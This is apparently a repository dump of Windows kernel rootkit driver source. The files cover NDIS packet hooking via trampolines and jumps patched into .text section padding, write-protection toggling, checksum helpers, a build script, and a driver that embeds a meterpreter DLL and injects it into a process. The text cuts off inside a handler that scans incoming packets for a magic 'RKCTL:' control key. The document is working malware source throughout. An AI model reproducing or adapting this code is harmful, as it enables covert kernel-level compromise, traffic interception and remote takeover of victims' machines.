NDIS_INTERRUPT_BLOCK_MiniportDpc                    = -1;\r\n\r\nNDIS_HOOK_BUFFER_HANDLER m_Handler = NULL;\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler)\r\n{\r\n    UINT NdisVersion = NdisGetVersion();\r\n    if (NdisVersion != 0x60014)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: NDIS version 0x%x is not supported\\n\", NdisVersion);\r\n        return FALSE;\r\n    }\r\n\r\n    m_Handler = Handler;\r\n\r\n#ifdef _X86_\r\n\r\n    NDIS_PROTOCOL_BLOCK_OpenQueue                       = 0x00c;\r\n    NDIS_PROTOCOL_BLOCK_NextProtocol                    = 0x008;\r\n    NDIS_PROTOCOL_BLOCK_Name                            = 0x024;\r\n    NDIS_OPEN_BLOCK_ProtocolNextOpen                    = 0x0dc;\r\n    NDIS_OPEN_BLOCK_MiniportHandle                      = 0x008;\r\n    NDIS_MINIPORT_BLOCK_InterruptEx                     = 0x1c0;\r\n    NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler   = 0x19c;\r\n    
NDIS_INTERRUPT_BLOCK_MiniportDpc                    = 0x010;\r\n\r\n#endif\r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol)\r\n{    \r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n    if (NDIS_PROTOCOL_BLOCK_Name         < 0 ||\r\n        NDIS_PROTOCOL_BLOCK_NextProtocol < 0)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n        return NULL;\r\n    }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n    PUCHAR Protocol = (PUCHAR)hBogusProtocol;\r\n\r\n    // enumerate registered NDIS protocols\r\n    while (Protocol)\r\n    {\r\n        PUNICODE_STRING ProtocolName = (PUNICODE_STRING)(Protocol + NDIS_PROTOCOL_BLOCK_Name);\r\n\r\n        // find TCPIP protocol\r\n        if (RtlEqualUnicodeString(ProtocolName, usProtocol, TRUE))\r\n        {            \r\n            return Protocol;\r\n        }\r\n\r\n        Protocol = *(PUCHAR *)(Protocol + NDIS_PROTOCOL_BLOCK_NextProtocol);\r\n    }        \r\n\r\n    return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n    if (NDIS_PROTOCOL_BLOCK_OpenQueue    < 0 ||        \r\n        NDIS_OPEN_BLOCK_ProtocolNextOpen < 0)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n        return NULL;\r\n    }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n    if (OpenBlock)\r\n    {\r\n        return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_ProtocolNextOpen);        \r\n    }\r\n    else\r\n    {\r\n        return *(PVOID *)((PUCHAR)Protocol + NDIS_PROTOCOL_BLOCK_OpenQueue);\r\n    }\r\n\r\n    return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID 
NdisHookOpenGetMiniport(PVOID OpenBlock)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n    if (NDIS_OPEN_BLOCK_MiniportHandle < 0)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n        return NULL;\r\n    }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n    return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_MiniportHandle);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS CopyNBLToBuffer(PNET_BUFFER_LIST NetBufferList, PVOID *pDest, PULONG pBytesCopied) \r\n{\r\n    NDIS_STATUS Status = NDIS_STATUS_SUCCESS;\r\n    PNET_BUFFER CurrentNetBuffer;\r\n\r\n    __try\r\n    {\r\n        *pBytesCopied = 0;\r\n\r\n        for (CurrentNetBuffer = NET_BUFFER_LIST_FIRST_NB(NetBufferList);\r\n            CurrentNetBuffer != NULL;\r\n            CurrentNetBuffer = NET_BUFFER_NEXT_NB(CurrentNetBuffer))\r\n        {\r\n            PMDL CurrentMdl = NET_BUFFER_CURRENT_MDL(CurrentNetBuffer);\r\n            PUCHAR pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority);\r\n            if (pSrc == NULL)\r\n            {\r\n                if (*pDest && *pBytesCopied > 0)\r\n                {\r\n                    ExFreePool(*pDest);\r\n                }\r\n\r\n                Status = NDIS_STATUS_RESOURCES;\r\n                __leave;\r\n            }\r\n\r\n            // For the first MDL with data, we need to skip the free space\r\n            pSrc += NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer);\r\n\r\n            LONG CurrLength = MmGetMdlByteCount(CurrentMdl) - NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer);\r\n            if (CurrLength > 0)\r\n            {\r\n                ULONG CopyLegth = *pBytesCopied + CurrLength;\r\n                PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth);\r\n                if (CopyBuff)\r\n                {\r\n                    if (*pDest && *pBytesCopied > 0)\r\n                    {\r\n     
                   RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied);\r\n                        ExFreePool(*pDest);\r\n                    }\r\n\r\n                    // Copy the data.\r\n                    NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength);\r\n                    *pDest = CopyBuff;\r\n                }                \r\n                else\r\n                {\r\n                    if (*pDest && *pBytesCopied > 0)\r\n                    {\r\n                        ExFreePool(*pDest);\r\n                    }\r\n\r\n                    Status = NDIS_STATUS_RESOURCES;\r\n                    __leave;\r\n                }\r\n\r\n                *pBytesCopied += CurrLength;\r\n                pDest += CurrLength;\r\n            }\r\n\r\n            CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl);\r\n            while (CurrentMdl)\r\n            {\r\n                pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority);\r\n                if (!pSrc)\r\n                {\r\n                    if (*pDest && *pBytesCopied > 0)\r\n                    {\r\n                        ExFreePool(*pDest);\r\n                    }\r\n\r\n                    Status = NDIS_STATUS_RESOURCES;\r\n                    __leave;\r\n                }\r\n\r\n                CurrLength = MmGetMdlByteCount(CurrentMdl);\r\n\r\n                if (CurrLength > 0)\r\n                {\r\n                    ULONG CopyLegth = *pBytesCopied + CurrLength;\r\n                    PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth);\r\n                    if (CopyBuff)\r\n                    {\r\n                        if (*pDest && *pBytesCopied > 0)\r\n                        {\r\n                            RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied);\r\n                            ExFreePool(*pDest);\r\n                        }\r\n\r\n                        // Copy the data.\r\n                        NdisMoveMemory(CopyBuff + 
*pBytesCopied, pSrc, CurrLength);\r\n                        *pDest = CopyBuff;\r\n                    }                \r\n                    else\r\n                    {\r\n                        if (*pDest && *pBytesCopied > 0)\r\n                        {\r\n                            ExFreePool(*pDest);\r\n                        }\r\n\r\n                        Status = NDIS_STATUS_RESOURCES;\r\n                        __leave;\r\n                    }\r\n\r\n                    *pBytesCopied += CurrLength;\r\n                    pDest += CurrLength;\r\n                }\r\n\r\n                CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl);\r\n            }\r\n        }\r\n    }\r\n    __finally { }\r\n\r\n    return Status;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n\r\n#pragma pack(push, 1)\r\ntypedef struct _HOOK_STRUCT\r\n{\r\n    UCHAR op1_0x58; /* POP  EAX */\r\n    \r\n    UCHAR op2_0x68; /* PUSH OldHandler */\r\n    PVOID OldHandler;\r\n\r\n    UCHAR op3_0x68; /* PUSH OldHandlerContext */\r\n    PVOID OldHandlerContext;\r\n\r\n    UCHAR op4_0x50; /* PUSH EAX */\r\n    \r\n    UCHAR op5_0x68; /* PUSH Handler */\r\n    PVOID Handler;\r\n\r\n    UCHAR op6_0xc3; /* RET */\r\n\r\n} HOOK_STRUCT,\r\n*PHOOK_STRUCT;\r\n#pragma pack(pop)\r\n\r\nPVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler)\r\n{\r\n    // allocate trampoline for hook handler calling\r\n    PHOOK_STRUCT HookStruct = (PHOOK_STRUCT)ExAllocatePool(NonPagedPool, sizeof(HOOK_STRUCT));\r\n    if (HookStruct)\r\n    {\r\n        HookStruct->op1_0x58 = 0x58;\r\n        HookStruct->op2_0x68 = 0x68;\r\n        HookStruct->OldHandler = OldHandler;\r\n        HookStruct->op3_0x68 = 0x68;\r\n        HookStruct->OldHandlerContext = OldHandlerContext;\r\n        HookStruct->op4_0x50 = 0x50;\r\n        HookStruct->op5_0x68 = 0x68;\r\n        HookStruct->Handler = Handler;\r\n        HookStruct->op6_0xc3 = 
0xc3;\r\n    }\r\n\r\n    return HookStruct;\r\n}\r\n\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\n#define JUMP_SIZE 6\r\n\r\nPVOID NdisHookAllocJump(PVOID Address, PVOID Destination)\r\n{\r\n    PVOID Image = NULL;\r\n\r\n    PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation);\r\n    if (Info)\r\n    {\r\n        for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n        {\r\n            // find image by address inside it\r\n            if (Address > Info->Modules[i].ImageBase &&\r\n                Address < (PUCHAR)Info->Modules[i].ImageBase + Info->Modules[i].ImageSize)\r\n            {\r\n                Image = Info->Modules[i].ImageBase;\r\n                break;\r\n            }\r\n        }\r\n\r\n        ExFreePool(Info);\r\n    }\r\n\r\n    if (Image == NULL)\r\n    {\r\n        // unknown address\r\n        return Destination;\r\n    }\r\n\r\n    PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n        (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n        (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n    UCHAR ZeroBytes[JUMP_SIZE];\r\n    RtlZeroMemory(ZeroBytes, sizeof(ZeroBytes));\r\n\r\n    // find the '.text' section\r\n    for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++, pSection++)\r\n    {            \r\n        if (!strcmp((char *)&pSection->Name, \".text\") &&\r\n            (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) &&\r\n            !(pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE))\r\n        {\r\n            // calculate the real size of section \r\n            ULONG RealSize = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n            ULONG PaddingSize = RealSize - pSection->Misc.VirtualSize;\r\n            if 
(PaddingSize > JUMP_SIZE)\r\n            {\r\n                // find section padding\r\n                PUCHAR Padding = RVATOVA(Image, pSection->VirtualAddress + pSection->Misc.VirtualSize);\r\n\r\n                for (ULONG p = PaddingSize - JUMP_SIZE; p != 0; p--)\r\n                {\r\n                    PUCHAR Ptr = Padding + p;\r\n\r\n                    // check for zero bytes\r\n                    if (RtlCompareMemory(Ptr, ZeroBytes, JUMP_SIZE) == JUMP_SIZE)\r\n                    {                        \r\n                        ClearWp();\r\n#ifdef _X86_\r\n                        // allocate jump\r\n                        *(Ptr + 0) = 0x68; /* PUSH Destination */\r\n                        *(PVOID *)(Ptr + 1) = Destination;\r\n                        *(Ptr + 1 + sizeof(PVOID)) = 0xc3; /* RET */\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n                        SetWp();\r\n\r\n                        return Ptr;\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n\r\n    return Destination;\r\n}\r\n//--------------------------------------------------------------------------------------\r\ntypedef void (NTAPI * func_IndicateNetBufferListsHandler)(\r\n    NDIS_HANDLE MiniportAdapterHandle,\r\n    PNET_BUFFER_LIST NetBufferLists,\r\n    NDIS_PORT_NUMBER PortNumber,\r\n    ULONG NumberOfNetBufferLists,\r\n    ULONG ReceiveFlags\r\n);\r\n\r\nvoid IndicateNetBufferListsHandler(\r\n    /***/\r\n    PVOID Reserved,\r\n    func_IndicateNetBufferListsHandler OldHandler,\r\n    /***/\r\n    NDIS_HANDLE MiniportAdapterHandle,\r\n    PNET_BUFFER_LIST NetBufferLists,\r\n    NDIS_PORT_NUMBER PortNumber,\r\n    ULONG NumberOfNetBufferLists,\r\n    ULONG ReceiveFlags)\r\n{        \r\n    // iterate NET_BUFFER_LIST\r\n    PNET_BUFFER_LIST BufferList = NetBufferLists;\r\n    while (BufferList)\r\n    {\r\n        PVOID Buff = NULL;\r\n        ULONG BuffSize = 0;\r\n\r\n        // get raw 
buffers data\r\n        if (CopyNBLToBuffer(BufferList, &Buff, &BuffSize) == NDIS_STATUS_SUCCESS)\r\n        {\r\n\r\n#ifdef DBG_NDIS_HOOK\r\n\r\n            DbgMsg(__FUNCTION__\"(): Miniport = \"IFMT\", Length = %d\\n\", MiniportAdapterHandle, BuffSize);\r\n#endif\r\n            if (m_Handler)\r\n            {\r\n                // call the data handler\r\n                m_Handler(MiniportAdapterHandle, Buff, BuffSize);\r\n            }\r\n\r\n            ExFreePool(Buff);\r\n        }\r\n\r\n        BufferList = NET_BUFFER_LIST_NEXT_NBL(BufferList);\r\n    }    \r\n\r\n    // call original function\r\n    OldHandler(\r\n        MiniportAdapterHandle,\r\n        NetBufferLists,\r\n        PortNumber,\r\n        NumberOfNetBufferLists,\r\n        ReceiveFlags        \r\n    );\r\n}\r\n\r\ntypedef void (NTAPI * func_MiniportInterruptDPC)(\r\n    NDIS_HANDLE MiniportInterruptContext,\r\n    PVOID MiniportDpcContext,\r\n    PVOID ReceiveThrottleParameters,\r\n    PVOID NdisReserved2\r\n);\r\n\r\nvoid MiniportInterruptDPC(\r\n    /***/\r\n    PVOID Miniport,\r\n    func_MiniportInterruptDPC OldHandler,\r\n    /***/\r\n    NDIS_HANDLE MiniportInterruptContext,\r\n    PVOID MiniportDpcContext,\r\n    PVOID ReceiveThrottleParameters,\r\n    PVOID NdisReserved2)\r\n{\r\n    PVOID Handler = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler);\r\n\r\n#ifdef DBG_NDIS_HOOK\r\n\r\n    DbgMsg(__FUNCTION__\"(): Miniport = \"IFMT\"\\n\", Miniport);\r\n\r\n#endif\r\n\r\n    // allocate trampoline for hook handler calling\r\n    PVOID HookStruct = NdisHookAlloc(Handler, NULL, IndicateNetBufferListsHandler);\r\n    if (HookStruct)\r\n    {\r\n        // hook _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler\r\n        *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = HookStruct;\r\n    }\r\n\r\n    // call original function\r\n    OldHandler(\r\n        MiniportInterruptContext,\r\n        MiniportDpcContext,\r\n        
ReceiveThrottleParameters,\r\n        NdisReserved2\r\n    );\r\n\r\n    if (HookStruct)\r\n    {\r\n        // restore _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler\r\n        *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = Handler;\r\n        ExFreePool(HookStruct);\r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nULONG NdisHookSet(PUCHAR PointerFixup)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n    if (NDIS_MINIPORT_BLOCK_InterruptEx                     < 0 ||        \r\n        NDIS_INTERRUPT_BLOCK_MiniportDpc                    < 0 ||\r\n        NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler   < 0)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n        return 0;\r\n    }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n    ULONG Hooked = 0;\r\n    NDIS_HANDLE hBogusProtocol = BogusProtocolRegister();\r\n    if (hBogusProtocol)\r\n    {\r\n        UNICODE_STRING usTcpIp;\r\n        RtlInitUnicodeString(&usTcpIp, L\"TCPIP\");\r\n\r\n        // lookup the 'TCPIP' protocol\r\n        PVOID Protocol = NdisHookProtocolFind(hBogusProtocol, &usTcpIp);\r\n        if (Protocol)\r\n        {\r\n            DbgMsg(__FUNCTION__\"(): \\\"TCPIP\\\" protocol address is \"IFMT\"\\n\", Protocol);\r\n\r\n            // enumerate open miniports\r\n            PVOID OpenBlock = NULL;\r\n            while (OpenBlock = NdisHookProtocolEnumOpened(Protocol, OpenBlock))\r\n            {\r\n                // get miniport address\r\n                PVOID Miniport = NdisHookOpenGetMiniport(OpenBlock);\r\n                if (Miniport)\r\n                {\r\n                    DbgMsg(__FUNCTION__\"(): Open block = \"IFMT\", Miniport = \"IFMT\"\\n\", OpenBlock, Miniport);\r\n\r\n                    // get _NDIS_INTERRUPT_BLOCK address\r\n                    PVOID InterruptEx = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_InterruptEx);\r\n   
                 if (InterruptEx == NULL)\r\n                    {\r\n                        continue;\r\n                    }\r\n\r\n                    // change _NDIS_INTERRUPT_BLOCK::MiniportDpc routine address\r\n                    PVOID MiniportDpc = *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc);\r\n                    if (MiniportDpc == NULL)\r\n                    {\r\n                        continue;\r\n                    }\r\n\r\n                    // allocate trampoline for hook handler calling\r\n                    PVOID HookStruct = NdisHookAlloc(MiniportDpc, Miniport, RECALCULATE_POINTER(MiniportInterruptDPC));\r\n                    if (HookStruct)\r\n                    {\r\n                        // hook _NDIS_INTERRUPT_BLOCK::MiniportDpc\r\n                        *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc) = NdisHookAllocJump(MiniportDpc, HookStruct);\r\n\r\n                        DbgMsg(__FUNCTION__\"(): Hooking MiniportDpc: \"IFMT\" -> \"IFMT\"\\n\", MiniportDpc, HookStruct);\r\n\r\n                        Hooked += 1;\r\n                    }\r\n                }\r\n            }\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FUNCTION__\"() ERROR: Unable to find \\\"TCPIP\\\" protocol\\n\");\r\n        }\r\n\r\n        BogusProtocolUnregister();\r\n    }\r\n\r\n    return Hooked;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_driver/ndis_hook.h",
    "content": "\r\ntypedef void (NTAPI * NDIS_HOOK_BUFFER_HANDLER)(PVOID MiniportHandle, PVOID Buffer, ULONG Size);\r\n\r\nextern \"C\"\r\n{\r\n    BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler);\r\n    PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol);\r\n    PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock);\r\n    PVOID NdisHookOpenGetMiniport(PVOID OpenBlock);\r\n    PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler);\r\n    PVOID NdisHookAllocJump(PVOID Address, PVOID Destination);\r\n    ULONG NdisHookSet(PUCHAR PointerFixup);\r\n};\r\n"
  },
  {
    "path": "src/rootkit_driver/network.cpp",
    "content": "#include \"stdafx.h\"\r\n//--------------------------------------------------------------------------------------\r\nSHORT ChecksumEnd(ULONG Sum)\r\n{\r\n    Sum = (Sum >> 16) + (Sum & 0xffff);\r\n    Sum += (Sum >> 16);\r\n\r\n    return (USHORT)(~Sum);\r\n}\r\n\r\n/*\r\n * Calculate checksum of a buffer.\r\n * @param Data Pointer to buffer with data.\r\n * @param Count Number of bytes in buffer.\r\n * @param Seed Previously calculated checksum (if any).\r\n * @return Checksum of buffer.\r\n */\r\nULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed)    \r\n{\r\n    register ULONG Sum = Seed;\r\n\r\n    while (Count > 1)\r\n    {\r\n        Sum += *(PUSHORT)Data;\r\n        Count -= 2;\r\n        Data = (PVOID)((PUCHAR)Data + 2);\r\n    }\r\n\r\n    /* Add left-over byte, if any */\r\n    if (Count > 0)\r\n    {\r\n        Sum += *(PUCHAR)Data;\r\n    }\r\n\r\n    return Sum;\r\n}\r\n\r\nUSHORT Checksum(PVOID Data, int Count)\r\n{\r\n    ULONG Sum = ChecksumCompute(Data, Count, 0);\r\n    return ChecksumEnd(Sum);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nchar *inet_ntoa(ULONG Addr)\r\n{\r\n    static char buff[4 * sizeof(\"123\")];\r\n    PUCHAR ucp = (PUCHAR)&Addr;\r\n\r\n    sprintf(buff, \"%d.%d.%d.%d\",\r\n        ucp[0] & 0xff,\r\n        ucp[1] & 0xff,\r\n        ucp[2] & 0xff,\r\n        ucp[3] & 0xff);\r\n\r\n    return buff;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_driver/network.h",
    "content": "\r\n#define NET_MAC_ADDR_LEN 6\r\n\r\n#include <pshpack1.h>\r\ntypedef struct _NET_ETH_HEADER\r\n{\r\n    UCHAR  Dst[NET_MAC_ADDR_LEN];\r\n    UCHAR  Src[NET_MAC_ADDR_LEN];\r\n    USHORT Type;\r\n\r\n} NET_ETH_HEADER,\r\n*PNET_ETH_HEADER;\r\n#include <poppack.h>\r\n\r\n#define ETH_P_IP\t0x0800\t\t/* Internet Protocol packet\t*/\r\n#define ETH_P_ARP\t0x0806\t\t/* Address Resolution packet\t*/\r\n\r\n#define ETH_IS_BCAST_ADDR(Addr)                                     \\\r\n                                                                    \\\r\n    (((Addr)[0] == 0xff) && ((Addr)[1] == 0xff) &&                  \\\r\n     ((Addr)[2] == 0xff) && ((Addr)[3] == 0xff) &&                  \\\r\n     ((Addr)[4] == 0xff) && ((Addr)[5] == 0xff))\r\n\r\n\r\n#define ETH_MATCH_ADDR(Addr1, Addr2)                                \\\r\n                                                                    \\\r\n    (((Addr1)[0] == (Addr2)[0]) && ((Addr1)[1] == (Addr2)[1]) &&    \\\r\n     ((Addr1)[2] == (Addr2)[2]) && ((Addr1)[3] == (Addr2)[3]) &&    \\\r\n     ((Addr1)[4] == (Addr2)[4]) && ((Addr1)[5] == (Addr2)[5]))\r\n\r\n\r\n/* Standard well-defined IP protocols.  
*/ \r\nenum \r\n{ \r\n    IPPROTO_IP =     0,   /* Dummy protocol for TCP               */ \r\n    IPPROTO_ICMP =   1,   /* Internet Control Message Protocol    */ \r\n    IPPROTO_IGMP =   2,   /* Internet Group Management Protocol   */ \r\n    IPPROTO_TCP =    6,   /* Transmission Control Protocol        */ \r\n    IPPROTO_UDP =   17,   /* User Datagram Protocol               */ \r\n    IPPROTO_SCTP = 132,   /* Stream Control Transport Protocol    */ \r\n    IPPROTO_RAW  = 255,   /* Raw IP packets                       */ \r\n};\r\n\r\n#include <pshpack1.h>\r\ntypedef struct _NET_IPv4_HEADER\r\n{\r\n    UCHAR  HeaderLength:4, Version:4;\r\n    UCHAR  TypeOfService;\r\n    USHORT TotalLength;\r\n    USHORT Id;\r\n    USHORT FragmentOffset;\r\n    UCHAR  TimeToLive;\r\n    UCHAR  Protocol;\r\n    USHORT Checksum;\r\n    ULONG  Src;\r\n    ULONG  Dst;\r\n\r\n} NET_IPv4_HEADER, \r\n*PNET_IPv4_HEADER;\r\n#include <poppack.h>\r\n\r\n// unsigned long to TCP/IP network byte order\r\n#define HTONL(_a_)                  \\\r\n                                    \\\r\n    ((((_a_) & 0x000000FF) << 24) + \\\r\n     (((_a_) & 0x0000FF00) << 8)  + \\\r\n     (((_a_) & 0x00FF0000) >> 8)  + \\\r\n     (((_a_) & 0xFF000000) >> 24))\r\n\r\n// unsigned short to TCP/IP network byte order\r\n#define HTONS(_a_)                  \\\r\n                                    \\\r\n    (((0x00FF & (_a_)) << 8) +      \\\r\n     ((0xFF00 & (_a_)) >> 8))\r\n\r\n\r\nSHORT ChecksumEnd(ULONG Sum);\r\nULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed);\r\nUSHORT Checksum(PVOID Data, int Count);\r\nchar *inet_ntoa(ULONG Addr);\r\n"
  },
  {
    "path": "src/rootkit_driver/post_build.bat",
    "content": "@echo off\r\nif exist ..\\rootkit_driver_debug.sys ..\\bin2c.exe ..\\rootkit_driver_debug.sys rootkit_driver > ..\\includes\\rootkit_driver_debug.sys.h\r\nif exist ..\\rootkit_driver.sys ..\\bin2c.exe ..\\rootkit_driver.sys rootkit_driver > ..\\includes\\rootkit_driver.sys.h\r\npause"
  },
  {
    "path": "src/rootkit_driver/rootkit_driver.cpp",
    "content": "#include \"stdafx.h\"\r\n\r\n#pragma comment(linker,\"/MERGE:.rdata=.text\") \r\n#pragma comment(linker,\"/MERGE:.edata=.text\") \r\n\r\n#pragma section(\"INIT\",read,write,execute)\r\n\r\nextern \"C\"\r\n{    \r\n    NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);\r\n    void HookImageEntry(PVOID Image);\r\n    BOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength);\r\n    VOID LoadImageNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId, PIMAGE_INFO ImageInfo);\r\n    VOID DriverEntryInitializePayload(PUCHAR PointerFixup);\r\n};\r\n\r\n#pragma alloc_text(INIT, ClearWp)\r\n#pragma alloc_text(INIT, SetWp)\r\n#pragma alloc_text(INIT, NewDriverEntry)\r\n#pragma alloc_text(INIT, HookImageEntry)\r\n#pragma alloc_text(INIT, CheckForFreeArea)\r\n#pragma alloc_text(INIT, LoadImageNotify)\r\n#pragma alloc_text(INIT, DriverEntryInitializePayload)\r\n\r\n// user-mode DLL file\r\n#ifdef DBGMSG\r\n__declspec(allocate(\"INIT\"))\r\n#include \"../includes/meterpreter_debug.dll.h\"\r\n#else\r\n__declspec(allocate(\"INIT\"))\r\n#include \"../includes/meterpreter.dll.h\"\r\n#endif\r\n\r\n// defined in runtime.cpp\r\nextern PVOID m_DriverBase;\r\nULONG m_DriverSize = 0;\r\nBOOLEAN m_bDriverMustBeFreed = FALSE;\r\n\r\nULONG m_RkOffset = 0, m_RkSize = 0;\r\nPVOID m_FreeAreaFound = NULL;\r\n\r\n#define EP_PATCH_SIZE 6\r\nUCHAR m_EpOriginalBytes[EP_PATCH_SIZE];\r\nDRIVER_INITIALIZE *m_HookedEntry = NULL;\r\n\r\nPVOID m_Payload = NULL;\r\nULONG m_PayloadSize = 0;\r\n//--------------------------------------------------------------------------------------\r\nVOID InjectPayloadThread(PVOID Param)\r\n{\r\n    if (m_Payload && m_PayloadSize > 0)\r\n    {\r\n        // inject user mode payload into the process\r\n        InjectIntoProcessByName(METERPRETER_PROCESS, m_Payload, m_PayloadSize);\r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid NTAPI 
NdisHookHandleBuffer(PVOID MiniportHandle, PVOID Buffer, ULONG Size)\r\n{\r\n    if (Size < sizeof(NET_ETH_HEADER) + sizeof(NET_IPv4_HEADER))\r\n    {\r\n        // buffer is too small\r\n        return;\r\n    }\r\n\r\n    // check the ethernet header\r\n    PNET_ETH_HEADER Eth = (PNET_ETH_HEADER)Buffer;\r\n    if (Eth->Type != HTONS(ETH_P_IP))\r\n    {\r\n        // not a internet protocl packet\r\n        return;\r\n    }\r\n\r\n    // check the IP header\r\n    PNET_IPv4_HEADER Ip = (PNET_IPv4_HEADER)((PUCHAR)Eth + sizeof(NET_ETH_HEADER));\r\n\r\n    if (Ip->Version != 4 || Ip->HeaderLength * 4 != sizeof(NET_IPv4_HEADER))\r\n    {\r\n        // not a IPv4 packet\r\n        return;\r\n    }\r\n\r\n    if (Ip->Protocol != IPPROTO_ICMP && Ip->Protocol != IPPROTO_IP && Ip->Protocol != IPPROTO_UDP)\r\n    {\r\n        // unknown protocol\r\n        return;\r\n    }\r\n\r\n    if (HTONS(Ip->TotalLength) + sizeof(NET_ETH_HEADER) > Size)\r\n    {\r\n        // total length out of bounds\r\n        return;\r\n    }\r\n\r\n    // remember and reset checksum\r\n    USHORT Sum = Ip->Checksum; Ip->Checksum = 0;\r\n\r\n    // validate checksum\r\n    if (Sum != Checksum(Ip, sizeof(NET_IPv4_HEADER)))\r\n    {\r\n        return;\r\n    }\r\n\r\n    char Dst[16], Src[16];\r\n    strcpy(Dst, inet_ntoa(Ip->Dst));    \r\n    strcpy(Src, inet_ntoa(Ip->Src));    \r\n\r\n    DbgMsg(\r\n        __FUNCTION__\"() IP: From = %s, To = %s, Protocol = %d, Length = %d\\n\",\r\n        Src, Dst, Ip->Protocol, HTONS(Ip->TotalLength)\r\n    );\r\n\r\n    // find magic sequence in packet\r\n    char *lpszMagic = \"RKCTL:\" ROOTKIT_CTL_KEY;\r\n    for (ULONG i = 0; i < Size - strlen(lpszMagic); i++)\r\n    {\r\n        if (RtlCompareMemory((PUCHAR)Buffer + i, lpszMagic, strlen(lpszMagic)) == strlen(lpszMagic))\r\n        {\r\n            